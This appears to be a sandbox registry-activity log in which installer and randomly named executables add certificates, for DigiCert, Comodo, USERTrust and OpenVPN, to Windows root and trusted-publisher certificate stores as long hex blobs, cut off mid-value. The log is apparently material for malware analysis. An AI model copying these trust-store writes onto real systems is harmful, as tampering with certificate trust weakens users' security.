030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 kahRa2R1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703085c000000010000000400000000080000200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd oAKAmWkbAngMjKcBt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B oAKAmWkbAngMjKcBt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e kahRa2R1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b